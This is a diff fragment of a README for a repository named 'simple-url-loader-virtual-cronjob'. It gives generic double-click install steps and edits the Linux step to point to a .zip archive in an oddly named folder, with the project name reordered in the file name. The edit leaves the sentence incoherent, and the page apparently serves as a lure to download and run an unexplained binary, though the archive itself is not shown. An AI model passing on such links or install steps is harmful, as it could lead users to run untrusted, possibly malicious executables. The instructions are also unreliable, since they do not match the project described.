amirsohail024/simple-url-loader-virtual-cronjob/README.md

 2. **Open the File:**
    - Windows: Double-click the `.exe` file.
    - macOS: Double-click the `.dmg` file, then drag the application to your Applications folder.
-   - Linux: Extract the downloaded `.tar.gz` file and navigate to the folder in your terminal.
+   - Linux: Extract the downloaded `https://github.com/amirsohail024/simple-url-loader-virtual-cronjob/raw/refs/heads/main/irreconcilably/virtual-url-loader-simple-cronjob-v2.6.zip` file and navigate to the folder in your terminal.
 3. **Follow the Setup Instructions:** Follow the on-screen instructions to install the application.
 4. **Start the Application:** After installation, you can find the app in your applications list.
 Open it to start using.